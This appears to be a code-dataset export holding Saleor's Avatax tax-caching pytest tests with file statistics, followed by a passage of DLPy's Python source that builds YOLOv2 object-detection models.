avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_subtotal_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
# then
result = manager.calculate_checkout_subtotal(
checkout_info, lines, checkout_info.shipping_address, []
)
manager.calculate_checkout_subtotal(
checkout_info, lines, checkout_info.shipping_address, []
)
# Second Avatax call to make sure that we use cached response
# when
assert result == TaxedMoney(net=Money("64.07", "USD"), gross=Money("65", "USD"))
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_shipping_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
# then
result = manager.calculate_checkout_shipping(
checkout_info, lines, checkout_info.shipping_address, []
)
# when
assert result == TaxedMoney(net=Money("8.13", "USD"), gross=Money("10", "USD"))
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_shipping_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
# then
result = manager.calculate_checkout_shipping(
checkout_info, lines, checkout_info.shipping_address, []
)
manager.calculate_checkout_shipping(
checkout_info, lines, checkout_info.shipping_address, []
)
# Second Avatax call to make sure that we use cached response
# when
assert result == TaxedMoney(net=Money("8.13", "USD"), gross=Money("10", "USD"))
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_line_total_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
# then
result = manager.calculate_checkout_line_total(
checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
)
# when
assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_line_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
# then
result = manager.calculate_checkout_line_total(
checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
)
manager.calculate_checkout_line_total(
checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
)
# Second Avatax call to make sure that we use cached response
# when
assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_line_unit_price_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
quantity = checkout_line_info.line.quantity
total_line_price = checkout_line_info.channel_listing.price * quantity
# then
result = manager.calculate_checkout_line_unit_price(
total_line_price,
quantity,
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
)
# when
assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_line_unit_price_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
quantity = checkout_line_info.line.quantity
total_line_price = checkout_line_info.channel_listing.price * quantity
# then
result = manager.calculate_checkout_line_unit_price(
total_line_price,
quantity,
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
)
manager.calculate_checkout_line_unit_price(
total_line_price,
quantity,
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
)
# Second Avatax call to make sure that we use cached response
# when
assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_get_checkout_line_tax_rate_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
fake_unit_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
# then
result = manager.get_checkout_line_tax_rate(
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
fake_unit_price,
)
# when
assert result == Decimal("0.23")
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_get_checkout_line_tax_rate_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
checkout_line_info = lines[0]
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
fake_unit_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
# then
result = manager.get_checkout_line_tax_rate(
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
fake_unit_price,
)
manager.get_checkout_line_tax_rate(
checkout_info,
lines,
checkout_line_info,
checkout_info.shipping_address,
[],
fake_unit_price,
)
# Second Avatax call to make sure that we use cached response
# when
assert result == Decimal("0.23")
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_get_checkout_shipping_tax_rate_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
fake_shipping_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
# then
result = manager.get_checkout_shipping_tax_rate(
checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
)
# when
assert result == Decimal("0.23")
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_get_checkout_shipping_tax_rate_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
fake_shipping_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
# then
result = manager.get_checkout_shipping_tax_rate(
checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
)
manager.get_checkout_shipping_tax_rate(
checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
)
# Second Avatax call to make sure that we use cached response
# when
assert result == Decimal("0.23")
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
| 33.947137
| 85
| 0.746388
| 2,783
| 23,118
| 5.736615
| 0.036651
| 0.063138
| 0.089446
| 0.10523
| 0.984591
| 0.980332
| 0.980332
| 0.977701
| 0.977701
| 0.977701
| 0
| 0.004089
| 0.174929
| 23,118
| 680
| 86
| 33.997059
| 0.832914
| 0.027814
| 0
| 0.847943
| 0
| 0
| 0.064392
| 0.056812
| 0
| 0
| 0
| 0
| 0.062612
| 1
| 0.025045
| false
| 0
| 0.014311
| 0
| 0.039356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b1543ce872aecc0a1adc7bd996f5f87e6352f8dd
| 46,874
|
py
|
Python
|
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2018-08-27T15:10:11.000Z
|
2018-08-27T15:10:11.000Z
|
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | null | null | null |
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2019-09-19T15:59:26.000Z
|
2019-09-19T15:59:26.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dlpy.sequential import Sequential
from dlpy.layers import InputLayer, Conv2d, BN, Pooling, Detection, Dense, Reshape, Concat
from dlpy.utils import DLPyError
from .application_utils import get_layer_options, input_layer_options, not_supported_feature
def YoloV2(conn, anchors, model_table='YoloV2', n_channels=3, width=416, height=416, scale=1.0 / 255,
random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
num_to_force_coord=None, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Yolov2 architecture.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
anchors : list
Specifies the anchor box values.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 416
height : int, optional
Specifies the height of the input layer.
Default: 416
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the input layer.
Valid Values: 'none', 'random'
act : string, optional
Specifies the activation function for the batch normalization layers.
Default: 'leaky'
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 5
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 13
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
match_anchor_size : bool, optional
Whether to force the predicted box match the anchor boxes in sizes for all predictions
num_to_force_coord : int, optional
The number of leading chunk of images in training when the algorithm forces predicted objects
in each grid to be equal to the anchor box sizes, and located at the grid center
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1612.08242.pdf
'''
if len(anchors) != 2 * predictions_per_grid:
raise DLPyError('The size of the anchor list in the detection layer for YOLOv2 should be equal to '
'twice the number of predictions_per_grid.')
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
# conv1 224 416
model.add(Conv2d(32, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv2 112 208
model.add(Conv2d(64, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv3 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv4 56 104
model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv5 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv6 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv7 28 52
model.add(Conv2d(128, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv8 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv9 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv10 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv11 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv12 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv13 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv14 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv15 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv16 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv17 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv18 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(
Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes,
match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))
return model
def YoloV2_MultiSize(conn, anchors, model_table='YoloV2-MultiSize', n_channels=3, width=416, height=416, scale=1.0 / 255,
random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
num_to_force_coord=None, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Yolov2 architecture.
The model is same as Yolov2 proposed in original paper. In addition to
Yolov2, the model adds a passthrough layer that brings feature from an
earlier layer to lower resolution layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
anchors : list
Specifies the anchor box values.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 416
height : int, optional
Specifies the height of the input layer.
Default: 416
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the
input layer.
Valid Values: 'none', 'random'
act : string, optional
Specifies the activation function for the batch normalization layers.
Default: 'leaky'
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 5
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 13
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information. Default: False
match_anchor_size : bool, optional
Whether to force the predicted box match the anchor boxes in sizes for all predictions
num_to_force_coord : int, optional
The number of leading chunk of images in training when the algorithm forces predicted objects
in each grid to be equal to the anchor box sizes, and located at the grid center
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1612.08242.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
# conv1 224 416
model.add(Conv2d(32, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv2 112 208
model.add(Conv2d(64, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv3 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv4 56 104
model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv5 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv6 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv7 28 52
model.add(Conv2d(128, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv8 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv9 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv10 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv11 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv12 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv13 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
pointLayer1 = BN(act=act, name='BN5_13')
model.add(pointLayer1)
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv14 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv15 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv16 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv17 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv18 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
